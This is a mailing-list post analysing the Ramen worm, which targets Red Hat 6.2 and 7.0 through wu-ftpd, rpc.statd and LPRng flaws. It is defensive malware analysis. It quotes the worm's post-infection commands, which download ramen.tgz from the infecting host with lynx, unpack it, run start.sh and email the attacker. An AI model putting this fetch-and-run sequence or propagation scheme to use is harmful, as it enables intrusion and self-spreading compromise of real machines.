Re: Ramen worm . More details on it. ( found a password and e-mails crypted inside it)

[Daniel Martin <dtmartin24 () HOME COM>]

Mihai Moldovanu <mihaim () PROFM RO> writes:

> I completed reverse engineering the ramen worm. There are 3 crypted text messages in the worm :

Ok, so at this point I've been beaten to the punch by others, but
here's my analysis of this worm.  I hadn't seen an exploitable
hole/backdoor in the asp program, but if Mr. Moldovanu thinks there is
one I'll take a second look at it.

Nothing I say below represents the opinions of anyone but me
personally, and as I'm a bit tired now I may have made mistakes when
typing this up; take appropriate grains of salt.

RAMEN WORM

This worm is currently running around in the wild, as has been
recently noticed on the incidents mailing list.  It appears to be
targetted at Redhat 6.2 and 7.0 systems running either an exploitable
rpc service or a vulnerable wuftpd.

The similarity between the honey project's scan-of-the-month for
December (http://project.honeynet.org/scans/scan10/) is striking.
This likely reflects the fact that this worm was cobbled together
from commonly available tools in the cracker (we've got to get a
better name for these people) community.  The fact that the
binaries were treated in an inconsistent manner (not all were
stripped, for example) furthers that impression.

In any case, this worm begins its scan with a modified form of
synscan (http://www.psychoid.lam3rz.de/synscan.html) by psychoid.
Note that it appears that the synscan version used in this worm
appears to be from an earlier (i.e. version < 1.6) version of synscan
than is now available.  (There are exploit checks in the current
version that this version lacks)

This modified synscan does a check against the FTP banner (as used in
this worm, only port 21 is checked) for the strings "Mon Feb 28" and
"Wed Aug 9".  If it finds the first it writes the hostname and/or ip
of the scannee to the file ".w"; if it find the second it writes to the
file ".l".  (both in the current directory)  Presumably this serves to
differentiate two breeds of exploitable machines (Redhat 6.2 and Redhat 7.0?)

Then two different scripts launch attacks against the machines named in
those files.  (Actually, the attacks are launched as soon as synscan
identifies the machines; there's much backgrounding of processes done
in the scripts that drive this worm).

The attack plan against machines in the ".w" file  (i.e. RedHat 6.2
machines) is to first run a wu-ftpd exploit (it bears the text "venglin",
and I understand that he is the author of at least one publicly available
wu-ftpd exploit); though it appears that the exploit program itself is
designed with SuSe, RedHat 6.2 and FreeBSD in mind, the context of this
worm would in general only have it run against RedHat 6.2 machines.

After this attack, a copy of the widely available statdx exploit for
RedHat 6.2 nfsd's is run against the target machine.  If either attack
succeeds, the sequence of commands executed is:

mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
lynx -source http://%s:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh
echo Eat Your Ramen! | mail -s %s -c %s %s

The %s substitutions are, respectively, the IP address of the
infecting machine, IP address/hostname of the infected machine,
"gb31337 () hotmail com" and "gb31337 () yahoo com" (which addresses are by
now most likely disabled by the flood of mail)

Redhat 7 machines are attacked by something that appears to be aimed
at the LPRng syslog format bug, but I can't find anything out about
this tool beyond that.  Since the person making this worm forgot to
strip one of the copies of this tool that is included in the worm,
maybe someone else will fill me in on what tool this is.  In any case,
once that is achieved the same shell commands as before are executed.

Once in, the worm establishes a minimal HTTP/0.9 server on port 27374
to serve out copies of itself (it does this through inetd on RedHat
6.2 and xinetd on RedHat 7.0).  It determines its IP address, and
removes the vulnerable services it uses to spread itself - that is,
on RedHat 6.2 rpc.statd is removed; on RedHat 7.0 lpd is removed.
(One would assume that a remaining vulnerable wu-ftpd could lead
the worm to overwrite itself with subsequent infections of the same
machine)  Also, just for fun, any writeable index.html files are
replaced with a silly message.

One odd thing I notice is that this worm apparently leaves no backdoor
for its creator to use to gain shell access to the machine.  All I
see is it adding the lines "ftp" and "anonymous" to /etc/ftpusers.
Maybe the creator just wants ftp sites.

And now, the contents of that ramen.tgz file:
  All the binaries are in the archive twice, with RedHat 6.2 and RedHat 7.0
  versions.  Numerous binaries were not stripped, which makes the job of
  taking them apart easier.

asp:       An xinetd config. file that will start up the fake webserver
asp62:     HTTP/0.9-compatible server that always serves out the file
           /tmp/ramen.tgz - NOT stripped
asp7:      RedHat 7-compiled version - NOT stripped
bd62.sh:   Does the setup (installing wormserver, removing vulnerable
           programs, adding ftp users) for RedHat 6.2
bd7.sh:    Same for RedHat 7.0
getip.sh:  Utility script to get main external IP address
hackl.sh:  Driver to read the .l file and pass addresses to lh.sh
hackw.sh:  Driver to read the .w file and pass addresses to wh.sh
index.html: HTML document text
l62:       LPRng format string exploit program - NOT stripped
l7:        Same but compiled for RedHat 7 - stripped
lh.sh:     Driver script to execute the LPRng exploit with several
           different options
randb62:   Picks a random class-B subnet to scan on - NOT stripped
randb7:    Same but compiled for RedHat 7 - NOT stripped
s62:       statdx exploit - NOT stripped
s7:        Same but compiled for RedHat 7 - stripped
scan.sh:   get a classB network from randb and run synscan
start.sh:  Replace any index.html with the one from the worm; run getip;
           determine if we're RedHat 6.2 or 7.0 and run the appropriate
           bd*.sh and start*.sh
start62.sh: start (backgrounded) scan.sh, hackl.sh, and hackw.sh
start7.sh:  Same as start62.sh
synscan62:  Modified synscan tool - records to .w and .l files - stripped
synscan7:   Same but compiled for RedHat 7 - stripped
w62:        venglin wu-ftpd exploit - stripped
w7:         Same but compiled for RedHat 7 - stripped
wh.sh:     Driver script to call the "s" and "w" binaries against a given
           target.
wu62:      Apparently a mistake by the author.  "strings" shows it to be
           very similar to w62; nowhere is it ever invoked.

I'll leave it to others to draw their own conclusions.  I will point out
that it appears that this worm was not carefully constructed as much as
it was snapped together.  I strongly doubt that the author (or with a
compilation such as this, would "editor" be a more appropriate term?)
of this worm wrote any of the binaries himself (*) with the exception
of the HTTP/0.9 server.  (the asp* programs)  I'll also note that 27374
is a common (arguably the most common) windows trojan port, so it's not
too unusual to see lots of questionable activity on that portnumber.  I'm
not certain what (if anything) the worm author hoped to gain by using this
port as well.  (If you get the response "PWD" or "RPL[002]" from this
port, you're seeing the windows trojan subseven or something
masquerading as subseven)

(*) Yeah, gender bias.  I'll use all female pronouns the next time I take
a worm like this apart, ok?